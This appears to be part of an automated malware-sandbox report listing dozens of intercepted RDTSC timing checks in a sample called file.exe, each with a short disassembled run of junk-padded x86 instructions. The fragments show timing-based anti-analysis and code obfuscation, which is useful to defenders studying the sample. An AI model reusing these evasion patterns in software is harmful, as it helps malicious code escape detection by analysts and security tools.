              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E327 second address: A2E32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D60C second address: A2D628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D628 second address: A2D62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F534 second address: A2F538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F538 second address: A2F5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+122D5876h], eax 0x00000013 or ebx, dword ptr [ebp+122D39C1h] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FF7B0F3BFC8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jo 00007FF7B0F3BFD8h 0x00000040 jmp 00007FF7B0F3BFD2h 0x00000045 mov dword ptr [ebp+122D1DE4h], ebx 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 cmc 0x00000053 mov eax, dword ptr [ebp+122D0ED1h] 0x00000059 jmp 00007FF7B0F3BFD5h 0x0000005e push FFFFFFFFh 0x00000060 mov dword ptr [ebp+122D580Ah], ebx 0x00000066 nop 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FF7B0F3BFD2h 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F5EC second address: A2F604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007FF7B0C9CD46h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36E88 second address: A36EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF7B0F3BFCEh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnc 00007FF7B0F3BFC6h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367B2 second address: A367B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367B6 second address: A367E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007FF7B0F3BFCDh 0x0000000d pushad 0x0000000e jnc 00007FF7B0F3BFC6h 0x00000014 jo 00007FF7B0F3BFC6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367E3 second address: A367E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A367E7 second address: A3680B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FF7B0F3BFC6h 0x00000012 jmp 00007FF7B0F3BFD2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3680B second address: A36820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3694F second address: A36968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF7B0F3BFD2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A47C second address: A3A492 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007FF7B0C9CD54h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A492 second address: A3A496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A496 second address: A3A4E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FF7B0C9CD59h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FF7B0C9CD52h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF7B0C9CD50h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A62B second address: A3A634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A634 second address: A3A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A638 second address: A3A666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jnc 00007FF7B0F3BFC8h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A666 second address: A3A66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A66A second address: A3A674 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A674 second address: A3A699 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0C9CD48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FF7B0C9CD55h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40C2D second address: A40C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D18FC second address: 9D1905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1905 second address: 9D190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40131 second address: A4013F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF7B0C9CD46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4013F second address: A40145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40145 second address: A40159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40159 second address: A4015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4015F second address: A40165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40165 second address: A401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF7B0F3BFCDh 0x00000011 jmp 00007FF7B0F3BFD4h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF7B0F3BFCEh 0x0000001d jp 00007FF7B0F3BFC6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40345 second address: A40349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40498 second address: A404C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7B0F3BFCCh 0x00000008 jg 00007FF7B0F3BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FF7B0F3BFD2h 0x00000019 pop edx 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404C4 second address: A404D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF7B0C9CD46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404D3 second address: A404D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40753 second address: A40758 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40758 second address: A4075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4075E second address: A4076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF7B0C9CD46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40919 second address: A4091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4091D second address: A40921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A436C9 second address: A43703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b ja 00007FF7B0F3BFCEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF7B0F3BFD2h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43703 second address: A43722 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF7B0C9CD54h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE449 second address: 9CE481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF7B0F3BFD5h 0x0000000d jmp 00007FF7B0F3BFD8h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4ABAE second address: A4ABB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4ABB9 second address: A4ABFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD5h 0x00000009 jmp 00007FF7B0F3BFD1h 0x0000000e popad 0x0000000f push edi 0x00000010 jnp 00007FF7B0F3BFC6h 0x00000016 jnp 00007FF7B0F3BFC6h 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FF7B0F3BFC6h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A74E second address: A1A75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF7B0C9CD46h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AACC second address: A1AAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF7B0F3BFC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AAD6 second address: A1AADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ABC8 second address: A1AC00 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0F3BFC8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jg 00007FF7B0F3BFE0h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC00 second address: A1AC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC04 second address: A1AC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC0A second address: A1AC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7B0C9CD46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f add dword ptr [ebp+122D2A07h], edx 0x00000015 push 329FDC86h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC2A second address: A1AC2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC2E second address: A1AC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AC34 second address: A1AC3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ACA7 second address: A1ACAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AD57 second address: A1ADBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jns 00007FF7B0F3BFC6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jnc 00007FF7B0F3BFC8h 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d call 00007FF7B0F3BFD2h 0x00000022 mov ecx, dword ptr [ebp+122D37EDh] 0x00000028 pop ecx 0x00000029 mov edx, dword ptr [ebp+122D26E3h] 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FF7B0F3BFD2h 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE8D second address: A1AE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE92 second address: A1AEBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF7B0F3BFD0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF7B0F3BFD1h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AEBF second address: A1AEC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AEC3 second address: A1AF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jno 00007FF7B0F3BFC6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jno 00007FF7B0F3BFDCh 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jnp 00007FF7B0F3BFD1h 0x00000022 jmp 00007FF7B0F3BFCBh 0x00000027 jno 00007FF7B0F3BFD9h 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push ebx 0x00000035 push edi 0x00000036 pop edi 0x00000037 pop ebx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFC6 second address: A1AFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFCC second address: A1AFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFD0 second address: A1AFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AFDF second address: A1AFE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B7AE second address: A1B7CB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF7B0C9CD51h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B8A2 second address: A1B8D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, si 0x0000000f lea eax, dword ptr [ebp+1247E243h] 0x00000015 pushad 0x00000016 xor si, 6E3Eh 0x0000001b mov bx, cx 0x0000001e popad 0x0000001f mov edi, dword ptr [ebp+122D39FDh] 0x00000025 nop 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 ja 00007FF7B0F3BFC6h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B8D7 second address: A1B90B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF7B0C9CD53h 0x00000010 jmp 00007FF7B0C9CD4Dh 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 jns 00007FF7B0C9CD4Ch 0x0000001e jng 00007FF7B0C9CD46h 0x00000024 push eax 0x00000025 push edx 0x00000026 jns 00007FF7B0C9CD46h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B90B second address: 9FBA41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb cl, FFFFFFC2h 0x0000000b mov dword ptr [ebp+122D5880h], ecx 0x00000011 call dword ptr [ebp+1244516Ah] 0x00000017 jmp 00007FF7B0F3BFCBh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA41 second address: 9FBA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA45 second address: 9FBA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA49 second address: 9FBA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7B0C9CD4Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA59 second address: 9FBA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBA5F second address: 9FBA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49D2B second address: A49D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49D31 second address: A49D63 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF7B0C9CD4Ch 0x00000008 pushad 0x00000009 jnp 00007FF7B0C9CD46h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF7B0C9CD4Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jo 00007FF7B0C9CD50h 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EAF second address: A49EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF7B0F3BFD8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EDF second address: A49EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EE3 second address: A49EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF7B0F3BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A491 second address: A4A49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A620 second address: A4A624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A624 second address: A4A637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FF7B0C9CD48h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A637 second address: A4A63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51868 second address: A51878 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FF7B0C9CD4Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51878 second address: A51890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0F3BFD2h 0x0000000b rdtsc
